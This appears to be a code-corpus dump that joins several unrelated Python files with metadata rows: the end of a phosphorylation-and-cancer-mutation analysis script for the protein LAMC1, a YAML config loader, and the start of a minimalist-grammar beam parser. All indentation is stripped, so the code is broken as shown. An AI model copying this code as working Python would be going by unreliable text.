output.write("\n\n{:s}\nPhosphorylated residues Inside Active sites: (Total={:d})\n".format(dashes,len(inside)))
for i in assign_residues(inside,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residued Close within six residues proximity to Active sites: (Total={:d})\n".format(dashes,len(close)))
for i in assign_residues(close,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}\n\nPhosphorylated residued Outside of Active sites: (Total={:d})\n".format(dashes,len(outside)))
for i in assign_residues(outside,protein_sequence):
output.write("{:s}, ".format(i))
output.write("\n{:s}".format(underscore))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the third output file ~ ~
outputname=protein_name+"-Link_ActiveSite_with_kinases.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
output.write("{:s}\n".format(dashes))
for i in Results:
output.write("{:s} {:s}:\n".format(i.name,i.type))
output.write("\n{:5s}Phosphorylated residues Inside of Active sites: (Total={:d})\n{:5s}".format(" ",len(i.p_residues_inside)," "))
for a in assign_residues(i.p_residues_inside,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n\n{:5s}Phosphorylated residues Close to Active sites (within 6 residues proximity): (Total={:d})\n{:5s}".format(" ",len(i.p_residues_close)," "))
for a in assign_residues(i.p_residues_close,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n\n{:5s}Phosphorylated residues Outside of Active site: (Total={:d})\n{:5s}".format(" ",len(i.p_residues_outside)," "))
for a in assign_residues(i.p_residues_outside,protein_sequence):
output.write("{:s}, ".format(a))
output.write("\n{:s}\n\n".format(dashes))
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
# ~ ~ for the fourth output file ~ ~
outputname=protein_name+"-Possily_responsible_kinases.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
for i in Results_Exp_phosphp:
output.write("{:s}:\n".format(i.residue))
for a in i.responsible_kinases:
output.write("{:5s}{:s}\n".format("",a.name))
output.write("\n")
print("Results written on ",outputname," file.")
else:
raise IOError("Output file ",outputname," not created")
output.close()
return
def find_phosphorylations_inside(array):
#finds the residues in the array argument that are inside of active sites appends them in a list and returns that list.
inside_list=[]
for i in array:
for x in Active_sites:
if x.start<=i<=x.end: # residue is inside active sites
inside_list.append(i)
return inside_list
def find_phosphorylations_close(array, inside_list):
#finds the residues in the array argument that are close within six residues proximiry to active sites appends them in a list and returns that list.
close_list=[]
for i in array:
if (i not in inside_list): #if residue is not inside then is either close to or outside of active sites
for x in Active_sites:
if (x.start-6<=i<x.start or x.end<i<=x.end+6): #residue close within 6 residues proximity to active sites
close_list.append(i)
return close_list
def find_phosphorylations_outside (array, inside_list, close_list):
#finds the residues in the array argument that are outside of active sites appends them in a list and returns that list.
outside_list=[]
for i in array:
if ((i in inside_list) or (i in close_list)):
pass
else: #residue not inside neither close to active sites, therefore residue is outside active sites
outside_list.append(i)
return outside_list
def categorize_phosphorylations_relatively_to_active_sites(all_phosphorylations):
#categorizes the residues in all_phosphorylations in three lists (inside, close and outside) accordind to their location relatively to active sites(inside active sites, close within 6 residues proximity to active sites and outside of active sites)
Inside=find_phosphorylations_inside(all_phosphorylations)
Close=find_phosphorylations_close(all_phosphorylations, Inside)
Outside=find_phosphorylations_outside(all_phosphorylations,Inside,Close)
return Inside,Close,Outside
def link_kinases_with_active_sites(Results,inside,close,outside):
#Splits the total_p_residues of each result_kinase in the Results in three lists in the result_kinase that until now were empty.
#The lists are p_residues_inside, p_residues_close and p_residues_outside and take the residues of the kinase that are inside, close and outside of active sites,respectively.
for i in Results:
for x in i.total_p_residues:
if(x in inside):
i.p_residues_inside.append(x)
else: #x not inside so it is either close or outside of active sites
if (x in close):
i.p_residues_close.append(x)
else: #x not close so it is outside of active sites
if (x in outside):
i.p_residues_outside.append(x)
else:
print("Residue ",x," is not inside nor close nor outside of active sites!" )
return Results #returns again the Results but now the p_residues_inside, p_residues_close and p_residues_outside of each result_kinase in the Result are not empty but have values.
def find_responsible_kinases(Exp_phosph,Results):
#finds the possibly responsible kinases for the experimentally observed phosphorylations according to the predicted phosphorylated residues (total_p_residues attribute) of each result_protein object in Results.
Responsible_kinases=[] #buffer that contains all the kinases that could phosphorylate each residue. It takes result_kinase objects.
Results_Exp_phosph=[] #Has all the result_exp_phosph objects
for i in Exp_phosph:
residue_num=i[1:]
for a in Results:
if(len(a.total_p_residues)>0): #if the kinase is predicted to phosphorylate residues in the protein
if(int(residue_num) in a.total_p_residues):
Responsible_kinases.append(a)
Results_Exp_phosph.append(create_result_exp_phosph(i,Responsible_kinases))
Responsible_kinases=[] #empty list for the next Exp_phosph
return Results_Exp_phosph
def get_Mutations(TableFile):
#it parses an excel (.xlsx) file with mutations mined from CBioPortal. It only gets the point mutations.
Mutations=[] #List holding all the mutation objects
try:
wb=xlrd.open_workbook(TableFile)
sheet=wb.sheet_by_index(0)
try:
for i in range(sheet.nrows):
if ("Missense_Mutation" in sheet.row_values(i)): #only getting the Missense mutations and they result in a different amino acid. If a mutation is nonsense will result in the same amino acid that will not disturb the binding of kinases in the protein.
MutationType="Missense_Mutation"
if("deleterious" in sheet.cell_value(i,5)): #the column 5 should have this information in each row in the excel file
FuncImpact="deleterious"
if ("tolerated" in sheet.cell_value(i,5)): #the column 5 should have this information in each row in the excel file
FuncImpact="tolerated"
sampleID=str(sheet.cell_value(i,1)).strip()
cancerType=str(sheet.cell_value(i,2)).strip()
mutation= str(sheet.cell_value(i,3)).strip()
Mutation=create_AMutation(SampleID=sampleID, CancerType=cancerType, Mutation=mutation, FuncImpact=FuncImpact, MutationType=MutationType)
Mutations.append(Mutation)
#print(len(Mutations))
except:
print("\nSomething went wrong and could get the mutations.. Check the format of values of the excel file")
sys.exit() #telling to the user were the problem is, and quiting from the program
except:
print("\nSomething went wrong and could not open file... Check the format of the excel file with the mutations")
sys.exit() #telling to the user were the problem is, and quiting from the program
return Mutations
def assignResidueToAS(my_mutation):
#assigns a mutation to an active site if it is inside or close to it, and if it is outside of all active sites it marks the mutation as outside of active sites
locationToAS=""
activeSite=""
#put the mutation in an array to give it as an argument to the function categorize_phosphorylations_relatively_to_active_sites
my_mutationArray=[]
my_mutationArray.append(int(my_mutation))
inside, close, outside= categorize_phosphorylations_relatively_to_active_sites(my_mutationArray)
#because the my_mutationArray has only one value, only one of the arrays inside close, outside will have a length 1 and the rest two will have a length 0. The array that has the value 1 shows the location of the mutation relatively to active sites
if (len(outside)>0): #mutation is outside
locationToAS="Outside"
activeSite="-"
elif (len(close)>0):
locationToAS="Close" #mutation is close
for i in Active_sites:
if((int(i.start)-6<=int(my_mutation)<int(i.start)) or (int(i.end)<int(my_mutation)<=int(i.end)+6)):
activeSite= str(i.start) + "-" + str(i.end)
break
elif (len(inside)>0): #mutation is inside
locationToAS="Inside"
for i in Active_sites:
if(int(i.start)<=int(my_mutation)<=int(i.end)): #mutation is inside an active site
activeSite= str(i.start) + "-" + str(i.end)
break
else:
print("Something went wrong. A mutation should either be inside, close to or outside of an active site.")
return locationToAS,activeSite
def mutationExists(mutation_entry, array):
#finds if a mutation entry already exists in an array
status="does not exist"
for i in array: # two mutation entries are considered the same if they have the same Mutation value, the same SampleId value and the same Cancer type value.
if (i.Mutation==mutation_entry.Mutation):
if(i.SampleID==mutation_entry.SampleID):
if(i.CancerType==mutation_entry.CancerType):
status="exists"
return status
def only_keep_unique_mutations (Result_Mutations):
#it keeps only the unique entries of the Result_Mutations array and returns a new array with only the unique mutations
new_array=[]
i=0
new_array.append(Result_Mutations[i])
for x in range(i+1,len(Result_Mutations)):
if(mutationExists(Result_Mutations[x],new_array)=="does not exist"):
new_array.append(Result_Mutations[x])
return new_array
def find_Mutations(Results,MutationList,protein_name):
All_important_residues=merge_important_residues(Results)
Result_Mutations=[]
for i in MutationList:
my_mutation=str(i.Mutation[1:len(i.Mutation)-1])
dResidue=""
dKinase=""
locationAS=""
AS=""
dPlaces=[]
for x in All_important_residues:
#if mutation is in All_important_residues [important residues include phosphorylated residues]
if (str(my_mutation)==str(x)):
#then search if for which kinase it is an important residue.
for a in Results:
for y in a.total_i_residues:
if(str(my_mutation)==str(y)):
dKinase=a.name
dResidue="important residue"
#search if mutation is in total_p_residues because then it would be disturbing a phosphorylated residue
for y in a.total_p_residues:
if(str(my_mutation)==str(y)):
dResidue="phosphorylated residue"
dPlaces.append(create_dPlace(dKinase,dResidue))
break
locationAS,AS=assignResidueToAS(my_mutation)
Result_Mutations.append(create_result_mutation(i.SampleID, i.CancerType, i.Mutation, i.FuncImpact, i.MutationType, locationAS, AS, dPlaces))
Result_Mutations=only_keep_unique_mutations(Result_Mutations)
print_mutations_Results(Result_Mutations,protein_name)
return
def print_mutations_Results(Result_Mutations,protein_name):
# ~ ~ for the fifth output file ~ ~
outputname=protein_name+"-Mutations_disturbing_Phosphorylations.xls"
try:
wb=xlwt.Workbook(encoding = 'ascii')
sheet=wb.add_sheet("Missense Mutations")
sheet.write(0,0,"Sample ID")
sheet.write(0,1,"Cancer Type")
sheet.write(0,2,"Mutation")
sheet.write(0,3,"Amino Acid Change")
sheet.write(0,4,"Functional Impact")
sheet.write(0,5,"Location to AS")
sheet.write(0,6,"Active Site (AS)")
sheet.write(0,7,"No. disturbed Kinases")
sheet.write(0,8,"disturbed Kinases")
sheet.write(0,9,"disturbed Residue")
rowindex=1
for i in Result_Mutations:
sheet.write(rowindex,0, i.SampleID)
sheet.write(rowindex,1, i.CancerType)
mutation=str(i.Mutation[1:len(i.Mutation)-1])
sheet.write(rowindex,2, mutation)
aaChange=str(i.Mutation[0]+" -> "+i.Mutation[-1])
sheet.write(rowindex,3, aaChange)
sheet.write(rowindex,4, i.FuncImpact)
sheet.write(rowindex,5, i.locationAS)
sheet.write(rowindex,6, i.AS)
sheet.write(rowindex,7, len(i.dPlaces))
increase=0
for x in i.dPlaces:
sheet.write(rowindex,8+increase, x.kinase)
sheet.write(rowindex,9+increase, x.residue)
increase=increase+2
rowindex=rowindex+1
wb.save(outputname)
print("Results written on ",outputname," file.")
except:
print("\nSomething went wrong and could write result mutations in an excel file...")
sys.exit() #telling to the user were the problem is, and quiting from the program
return
def search_in_protein(protein_sequence):
#one function that does it all. Get the sequence, finds the motifs of all kinases in the sequence, categorizes the phosphorylated residues according to their position relatively to active sites, links the kinases with active sites, finds the possibly responsible kinases for the experimentally observed phosphorylations and sents all the results from wrtting in output files.
seq=get_sequence(protein_sequence)
protein_name=protein_sequence.split(".",1)
protein_name=str(protein_name[0])
Results=find_motifs_for_all_proteins(All_proteins,seq)
Inside,Close,Outside=categorize_phosphorylations_relatively_to_active_sites(merge_phospho_residues(Results))
#in the "new" Results the p_residues_inside,p_residues_close and p_residues_outside arguments are not empty lists but contain the kinase's residues that are inside, close and outside of active sites, correspondingly.
Results=link_kinases_with_active_sites(Results,Inside,Close,Outside)
Results_Exp_phosphp=find_responsible_kinases(Exp_Phosph,Results)
Exp_Inside, Exp_Close, Exp_Outside=categorize_phosphorylations_relatively_to_active_sites(de_assign_residues(Exp_Phosph))
#assign residues to them again for writting
Exp_Inside=assign_residues(Exp_Inside,seq)
Exp_Close=assign_residues(Exp_Close,seq)
Exp_Outside=assign_residues(Exp_Outside,seq)
#sent it all for writting on a file
print_results(Results,protein_name,seq,Inside,Close,Outside,Results_Exp_phosphp,Exp_Inside,Exp_Close,Exp_Outside)
find_Mutations(Results,MutationList,protein_name)
return
# ~ END functions ~ #
# ~ Main ~ #
##Inform user for the origin, function and requirments of the code
print("\nThis code is a modification of the PhosphoKin tool \n(Galliou, P.A., Verrou, K.M., 2019. An in silico method for studying the phosphorylation in association to active sites. Aristotle Biomedical Journal 1, 48–59). \n")
print("This code was implemented by Galliou Panagiota-Angeliki (email: ag.gal.work@gmail.com).\n")
print("Briefly, the PhosphoKin tool predicts phosphorylation sites and phosphorylated residues in a protein sequence based on kinase binding motifs.\n")
print("This code, modified the PhosphoKin tool to read cancer mutations found in the protein sequence and identify those deleterious missense point mutations that could obstruct the predicted phosphorylation of the protein according to the kinases' binding motifs, by either occuring directly on a predicted phosphorylated residue or occuring on required residues for kinase binding in a phosphorylation site.")
print("\nThe code takes 5 files as input: \n 1) A file with the active sites of the protein.\n 2) A file with the experimentally observed phosphorylated residues in the protein.\n 3) A file with the motif(s) of kinases(s) for which the user wants to find binding sites in the protein sequence.\n 4) A file with the sequence of the protein in a fasta format.\n 5) An xlsx file (excel) with the mutations of the protein that have been found in all types of cancer as downloaded from CBioPortal.\n")
print("The code creates 5 output files: \n 1) A file that shows the phosphorylation sites and phosphorylated residues for each given motif of each given protein.\n 2) A file that categorizes the phosphorylated residues in the protein according to their position relatively to the active sites of the protein.\n 3) A file that links the given kinases with the active sites of the protein.\n 4) A file that shows the possibly responsible kinase(s) for each experimentally observed phosphorylated residue in the protein.\n 5) An excel file with those missense point mutations found in the protein in cancer patients that could obstruct the protein's predicted phosphorylation either by occuring on the very exact amino acid that the kinase could phosphorylate or by occuring on the required surrounding residues for kinase binding to the phosphorylation site, according to kinases' motifs.\n")
print("The name of the above 5 output files are:\n 1) LAMC1-Kinases_Motifs.txt \n 2) LAMC1-Categorization_of_phosphorylations_comparatively_to_active_sites.txt \n 3) LAMC1-Link_ActiveSite_with_kinases.txt \n 4) LAMC1-Possily_responsible_kinases.txt \n 5) LAMC1-Mutations_disturbing_Phosphorylations.xls\n")
print("The 5 input files used by this code are uploaded in the following link:\nhttps://www.dropbox.com/sh/5p0b4fkri1uisbl/AABm9MqYvhaxEinaPKVTgfMGa?dl=0\n\nFor details on the format of the first 4 files, please refer to the manuscript of PhosphoKin Tool \n(Galliou, P.A., Verrou, K.M., 2019. An in silico method for studying the phosphorylation in association to active sites. Aristotle Biomedical Journal 1, 48–59).\n\nThe 5th input file should be formated as the LAMC1-Mutations.xlxs file in the above link \n(https://www.dropbox.com/s/e2paiz1jvhc8t07/LAMC1-Mutations.xlsx?dl=0).\n")
print("The input files should be in the same directory as the code upon running. \nThe output files are created in the directory of the code upon running.\n\n")
print("\n------------------------------------------------------------------\n\n")
"""
## Take the names of the required files as input from the user.
print("[ATTENTION: Please read the manual to make sure what format the required files should have.]\n")
### ~ ~ ~ Asking from user files and opening each file ~ ~ ~ ###
print ("\nNow, I would like you to give me the 5 files.\n ")
###Asking for the active sites
active_sites_file=input("\nGive the Active file, please: ")
if active_sites_file == 'help':
print("\nThe file must have the following format:\n Start_of_active_site_1 - End_of_active_site_1, Start_of_active_site_2 - End_of_active_site_2, etc \n e.g. 13-22, 150-162, 1147-1458, etc\n")
active_sites_file=input("\nGive the Active Sites file, please: ")
try:
#active_sites_file = "Active_sites.txt"
Active_sites=get_active_sites(active_sites_file) #Holds all the active site objects
except:
print("\nSomething went wrong... Check the format of the Active Sites file")
sys.exit() #telling to the user were the problem is, and quiting from the program
###Asking for the experimentally observed phosphorylated residues
exp_phospho_file=input("\nGive the Experimentally observed phosphorylated residues in the protein file, please: ")
if exp_phospho_file == 'help':
print("\nThe file must have the following format:\n phosphorylated_residue_1, phosphorylated_residue_2, phosphorylated_residue_3, etc..\n e.g S4, S156, T445, etc \n ")
exp_phospho_file=input("\nGive the Experimentally observed phosphorylated residues in the protein file, please: ")
try:
Exp_Phosph=get_exp_phosph_residues(exp_phospho_file) #Holds all the experimentallt observed phosphorylated residues as strings
except:
print("\nSomething went wrong... Check the format of the Experimentally observed phosphorylated residues in the protein file")
sys.exit() #telling to the user were the problem is, and quiting from the program
###Asking for the Motifs
motifs_file=input("\nGive the Motifs file, please: ")
if motifs_file == 'help':
print("\nThe file must have the following format: \n Name_of_kinase_1[space]protein type: motif_1, motif_2, motif_3, etc [enter] Name_of_kinase_2[space]protein type: motif_1,motif_2, etc [enter]\n H1K Kinase:[pS/pT]P[R/K]-[pS/pT]PX[R/K]-[R/K][pS/pT]P \nATM Kinase:pSQ-[P/L/I/M]X[L/I/E/D]pSQ-LpSQE\n")
motifs_file=input("\nGive the Motifs file, please: ")
try:
All_proteins=[] # Holds all the protein objects.
All_proteins=get_motifs(motifs_file)
except:
print("\nSomething went wrong... Check the format of the Motifs file")
sys.exit() #telling to the user were the problem is, and quiting from the program
###Asking for the Mutations
mutations_file=input("\nGive the Mutations file, please: ")
if mutations_file == 'help':
print("\nThe file must have the format as downloaded by CBioPortal \n [The columns should be in the following order: Sample ID, Cancer Type, Protein Change, Annotation, Functional Impact, Mutation Type, Copy, COSMIC, MS, VS, Center, Chromosome, Start Pos, End Pos, Ref, Var, Allele Freq (T), Allele Freq (N), Variant Reads, Ref Reads, Variant Reads (N), Ref Reads (N), # Mut in Sample] ")
mutations_file=input("\nGive the Mutations file, please: ")
try:
MutationList=[] # Holds all the protein objects.
MutationList=get_Mutations(mutations_file)
except:
print("\nSomething went wrong... Check the format of the Mutations file")
sys.exit() #telling to the user were the problem is, and quiting from the program
###Asking for the Seqeunce
sequence_file=input("\nGive the Protein Sequence file, please: ")
if sequence_file == 'help':
print("\nThe file must have a fasta format (https://en.wikipedia.org/wiki/FASTA_format).\n ")
sequence_file=input("\nGive the Protein Sequence file, please: ")
try:
search_in_protein(sequence_file)
except:
print("\nSomething went wrong... Check the format of the Sequence file")
sys.exit() #telling to the user were the problem is, and quiting from the program
print("\n\n------------------------------------------------------------------\n\n")
"""
##Taking the input files.
Active_sites=get_active_sites("LAMC1-Active_Sites.txt") #Takes the file with the active sites as input
Exp_Phosph=get_exp_phosph_residues("LAMC1-Experimentally_Observed_Phosphorylations.txt") #Takes the file with the experimentally observed phosphorylations as input
All_proteins=[] # Holds all the protein objects.
All_proteins=get_motifs("LAMC1-Kinase_Motifs.txt") #Takes the file with the kinases' recognition motifs as input
MutationList=get_Mutations("LAMC1-Mutations.xlsx") #Takes the file with the cancer mutations in the protein as input
search_in_protein("LAMC1.txt") #Takes the file with the protein sequence as input
# ~ END Main ~ #
| 51.559853 | 890 | 0.652713 |
3dbcc01b58fbaf96d5eea9d5027e91d1db314a29 | 269 | py | Python | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | null | null | null | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | 2 | 2021-03-25T22:20:12.000Z | 2021-06-01T23:10:13.000Z | config.py | edubarbieri/ddm | 0275ff7df3074631d9220725bd12b2becd963e1c | [
"MIT"
] | null | null | null | import yaml
config = {}
# read config file
with open("config.yml", 'r') as stream:
try:
config = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print("Error reading config file: ", exc)
exit(1)
def get_config():
return config
| 20.692308 | 49 | 0.624535 |
dcd655741a401bb95fab9902d11a17f683a2649e | 45,201 | py | Python | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | 9 | 2015-07-26T23:09:34.000Z | 2021-01-20T23:54:55.000Z | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | null | null | null | python/mgtdbp.py | epstabler/mgtdb | 41e0018a2aebee90a5bdafe21dfac8d743aca4a7 | [
"Apache-2.0"
] | 7 | 2015-07-20T16:46:03.000Z | 2021-08-14T02:01:17.000Z | """
file: mgtdbp.py
minimalist grammar top-down beam parser, development version.
This is a working, development version, with print routines and examples.
Using NLTK installed under Python 2.7, you can start the read-parse loop by
typing, in a terminal window:
python mgtdbp.py grammar startCategory minimumProbability
For example:
python mgtdbp.py mg0 C 0.0001
(For line mode editing, I start the loop with: rlwrap python mgtdbp.py)
The loop is started by the command at the bottom of this file.
Python will prompt you for a sentence to parse with the grammar specified
in that line.
If the grammar is mg0, for example, you could type one of:
the king prefers the beer
which queen says the king knows which wine the queen prefers
Then you will be given a prompt to which you can type
h
to get a list of the options.
This file extends mgtdb-dev.py to a parser, by keeping a tree in each
partial analysis. Note that, although this is a TD parser, derivation
nodes are not expanded left-to-right in the standard, so we record
the left-right order of each node with indices (similar to indexing of
predicted cats).
To each indexed category (iCat) we add its own dtree node index,
and we also add a list of the features checked in its own
projection so far.
To each derivation (der) we add its list of indexed category dtree node
indices. In each step of the derivation, we extend the parents node index,
putting the results into the derivation list, and in the
respective children.
So each indexed category ic = (i,c,dt) where dt is a "dtuple", that is:
(Fs checked so far, index of current node, array of Fs moving elements).
Here, dtuples are never checked during the parse, but they could be used
to influence probability assignments at each step.
For the moment, we compute just the most probable parse,
using a uniform distribution at each choice point,
returning the derivation (as a "dnode list", or else error,
instead of just true or false as the recognizer does.
TODO: implement more sophisticated pruning rule (cf Roark) and more
sophisticated determination of which trees should be returned.
* For cats that lack subtrees in lex, tA is not set. This does not matter,
but we could probably get rid of tA altogether.
* sA sets all features, but lA only needs non-empty lexTrees.
* We might speed things up by numbering all subtrees of the lexArray,
and using int list arrays to encode the whole lexTree.
Comments welcome: stabler@ucla.edu
"""
import sys
from nltk.util import in_idle
from nltk.tree import Tree
from nltk.draw import *
import heapq
import time
"""
We represent trees with lists, where the first element is the root,
and the rest is the list of the subtrees.
First, a pretty printer for these list trees:
"""
def pptreeN(n,t): # pretty print t indented n spaces
if isinstance(t,list) and len(t)>0:
sys.stdout.write('\n'+' '*n+'[')
print(t[0]), # print root and return
if len(t[1:])>0:
sys.stdout.write(',') # comma if more coming
for i,subtree in enumerate(t[1:]): # then print subtrees indented by 4
pptreeN(n+4,subtree)
if i<len(t[1:])-1:
sys.stdout.write(',') # comma if more coming
sys.stdout.write(']')
else:
sys.stdout.write('\n'+' '*n)
print(t),
def pptree(t):
if len(t)==0: # catch special case of empty tree, lacking even a root
sys.stdout.write('\n[]\n')
else:
pptreeN(0,t)
sys.stdout.write('\n')
"""
example:
pptree([1, 2, [3, 4], [5, 6]])
pptree(['TP', ['DP', ['John']], ['VP', ['V',['praises']], ['DP', ['Mary']]]])
I have intensionally written this prettyprinter so that the
prettyprinted form is a well-formed term.
"""
"""
We can convert a list tree to an NLTK tree with the following:
"""
def list2nltktree(listtree):
if isinstance(listtree,tuple): # special case for MG lexical items at leaves
return (' '.join(listtree[0]) + ' :: ' + ' '.join(listtree[1]))
elif isinstance(listtree,str): # special case for strings at leaves
return listtree
elif isinstance(listtree,list) and listtree==[]:
return []
elif isinstance(listtree,list):
subtrees=[list2nltktree(e) for e in listtree[1:]]
if subtrees == []:
return listtree[0]
else:
return Tree(listtree[0],subtrees)
else:
raise RuntimeError('list2nltktree')
"""
With an NLTK tree, we can use NLTK tree display:
list2nltktree(t).draw()
TreeView(t)
"""
"""
OK, we now begin implementing the beam parser.
We will number the categories so that we have only integer comparisons
at runtime, and we can use those integers as position indices.
The human readable form of the grammar:
mg0 = [ ([],[('sel','V'),('cat','C')]),
([],[('sel','V'),('pos','wh'),('cat','C')]),
(['the'],[('sel','N'),('cat','D')]),
(['which'],[('sel','N'),('cat','D'),('neg','wh')]),
(['king'],[('cat','N')]),
(['queen'],[('cat','N')]),
(['wine'],[('cat','N')]),
(['beer'],[('cat','N')]),
(['drinks'],[('sel','D'),('sel','D'),('cat','V')]),
(['prefers'],[('sel','D'),('sel','D'),('cat','V')]),
(['knows'],[('sel','C'),('sel','D'),('cat','V')]),
(['says'],[('sel','C'),('sel','D'),('cat','V')])
]
"""
"""
It will be good practice to print out those grammars in slightly
more readable forms, using the following functions:
"""
def btfyFtype(t):
if t=='cat':
return ''
elif t=='sel':
return '='
elif t=='neg':
return '-'
elif t=='pos':
return '+'
else:
raise RuntimeError('btfyFtype('+str(t)+')')
def btfyFeat((ftype,f)):
result = btfyFtype(ftype) + f
return result
def btfyLexItem((s,fs)):
fstrings = []
for f in fs:
fstrings.append(btfyFeat(f))
result = ' '.join(s) + '::' + ' '.join(fstrings)
return result
def showGrammar(g):
for item in g:
print(btfyLexItem(item))
"""
example: showGrammar(mg0)
"""
"""
Now we begin building the lexical representation of the grammar
as a tree (actually, as a list of trees)
"""
def ensureMember(e,l):
if e in l:
return l
else:
return l.append(e)
"""
example: ensureMember(2,[1,3])
example: ensureMember(2,[1,2])
"""
def stringValsOfG(g): # the string values of the features
sofar = []
for (ss,fs) in g:
for (ftype,fval) in fs:
ensureMember(fval,sofar)
return sofar
"""
example
sA0 = stringValsOfG(mg0)
sA2 = stringValsOfG(mg2)
"""
def listNth(e,l): # return (first) position of e in l
return l.index(e)
def intsOfF(sA,(ftype,fval)): # convert string representation of feature to integer pair
if ftype=='cat':
return (0,listNth(fval,sA))
elif ftype=='sel':
return (1,listNth(fval,sA))
elif ftype=='neg':
return (2,listNth(fval,sA))
elif ftype=='pos':
return (3,listNth(fval,sA))
else:
raise RuntimeError('error: intsOfF')
"""
intsOfF(sA0,('sel','N'))
"""
def fOfInts(sA,(itype,ival)): # convert int representation back to string pair
if itype==0:
return ('cat',sA[ival])
elif itype==1:
return ('sel',sA[ival])
elif itype==2:
return ('neg',sA[ival])
elif itype==3:
return ('pos',sA[ival])
else:
raise RuntimeError('error: fOfInts')
"""
fOfInts(sA0,(1,1))
btfyFeat(fOfInts(sA0,(1,1)))
"""
"""
To make building the tree representation of the grammar straightforward,
we reverse features lists and convert them to integers first
"""
def revItem (sl, (ss,fs)):
safe_fs = fs[:] # make a copy
if len(fs)>0:
rifs = [intsOfF(sl,f) for f in reversed(safe_fs)]
return (ss,rifs)
else:
return (ss,fs)
"""
examples:
item0=(['hi'],[])
revItem(sA0,item0)
item0=(['the'],[('sel','N'),('cat','D')])
revItem(sA0,item0)
"""
# some functions for print out
def lexTree2stringTree(sA,t):
if len(t)>0 and isinstance(t[0],tuple):
root = btfyFeat(fOfInts(sA,t[0]))
subtrees = lexTrees2stringTrees(sA,t[1:])
return [root]+subtrees
else:
return t
"""
example (using lA0 which is defined below):
intsOfF(sA0,('cat','D'))
lA0[0]
lexTree2stringTree(sA0,[intsOfF(sA0,('cat','D'))]+lA0[0])
"""
def lexTrees2stringTrees(sA,ts):
return [lexTree2stringTree(sA,t) for t in ts]
# to get trees in the array, insert the root feature determined by the index
def lexArrays2lexTrees((sA,lA,tA)):
return [ ([(tA[i],i)]+lA[i]) for i in range(len(sA)) ]
"""
example: lexArrays2lexTrees((sA0,lA0,tA0))
"""
def lexArrays2stringTrees((sA,lA,tA)):
return lexTrees2stringTrees(sA,lexArrays2lexTrees((sA,lA,tA)))
"""
example:
lexArrays2stringTrees((sA0,lA0,tA0))
"""
def findRoot(f,trees): # find subtree with root matching f, if there is one
for i,t in enumerate(trees):
if (isinstance(t,list) and len(t)>0 and t[0]==f):
return i
return -1
def revItemIntoLexTrees(lst, (ss,fs)):
for f in fs:
i = findRoot(f,lst)
if i>=0:
lst = lst[i]
else:
lst.append([f])
lst = lst[-1]
lst.append(ss)
"""
lexTreeList0 = []
item0=(['the'],[('sel','N'),('cat','D')])
revItem0 = revItem(sA0,item0)
revItemIntoLexTrees(lexTreeList0,revItem0)
item1=(['a'],[('sel','N'),('cat','D')])
revItem1 = revItem(sA0,item1)
revItemIntoLexTrees(lexTreeList0,revItem1)
item2=(['who'],[('sel','N'),('cat','D'),('neg','wh')])
revItem2 = revItem(sA0,item2)
revItemIntoLexTrees(lexTreeList0,revItem2)
item3=(['says'],[('sel','C'),('sel','D'),('cat','V')])
revItem3 = revItem(sA0,item3)
revItemIntoLexTrees(lexTreeList0,revItem3)
"""
def gIntoLexTreeList(sA,g):
lexTrees = []
for ri in [revItem(sA,i) for i in g]:
revItemIntoLexTrees(lexTrees,ri)
return lexTrees
"""
example:
ts0 = gIntoLexTreeList(sA0,mg0)
t0 = ['.']+ts0
ts2 = gIntoLexTreeList(sA2,mg2)
t2 = ['.']+ts2
list2nltktree(t0).draw()
That tree has the integer representation of the categories,
but now it's easy to "beautify" the features:
"""
def list2btfytree(sA,listtree):
if listtree==[]:
return []
else:
subtrees=[list2btfytree(sA,e) for e in listtree[1:]]
if isinstance(listtree[0],tuple):
root = btfyFeat(fOfInts(sA,listtree[0]))
else:
root = listtree[0]
return Tree(root,subtrees)
"""
list2btfytree(sA0,t0)
list2btfytree(sA0,t0).draw()
TreeView(list2btfytree(sA0,t0))
['V', 'C', 'wh', 'N', 'D']
"""
"""
Let's put those lexTrees in order, so that the subtree
with root type (i,j) appears in lA[j] and has feature type tA[j]=i.
Since lists are arrays in python, these lists will let us
get these values with simple O(1) lookup.
"""
def gIntoLexArrayTypeArray(sA,g):
lst = gIntoLexTreeList(sA,g)
lexArray = [[]]*len(sA)
typeArray = [0]*len(sA)
for t in lst:
# print t
(i,j)=t[0]
lexArray[j]=t[1:]
typeArray[j]=i
return (lexArray,typeArray)
"""
example:
(lA0,tA0) = gIntoLexArrayTypeArray(sA0,mg0)
lexArrays0 = (sA0,lA0,tA0)
(lA2,tA2) = gIntoLexArrayTypeArray(sA2,mg2)
lexArrays2 = (sA2,lA2,tA2)
check: OK
t2 = ['.']+lexArrays2stringTrees((sA2,lA2,tA2))
TreeView(list2nltktree(st2))
"""
def btfyIndex(lst):
return ''.join([str(i) for i in lst])
def printCatI((ts,ixs)):
for (t,i) in zip(ts,ixs):
pptree(t)
print i,',',
def nonEmptyMover((tree,index)): # a tree with just a root is "empty"
return len(tree) > 1
def deleteEmpties((movertrees,moverIndices)):
result = zip(*filter(nonEmptyMover,zip(movertrees,moverIndices)))
if result==[]:
return ([],[])
else:
return result
def printIcat((sA,lA,tA),((h,mA),(ih,iA),dt)):
ihS = btfyIndex(ih)
iASs = [btfyIndex(i) for i in iA]
hTs = lexTrees2stringTrees(sA,h) # nb: h is a tree list
mTs = lexArrays2stringTrees((sA,mA,tA)) # mA an array of tree lists
for t in hTs:
pptree(t)
print ihS,',',
printCatI(deleteEmpties((mTs,iASs)))
"""
example:
def testic0():
h=lA0[0]
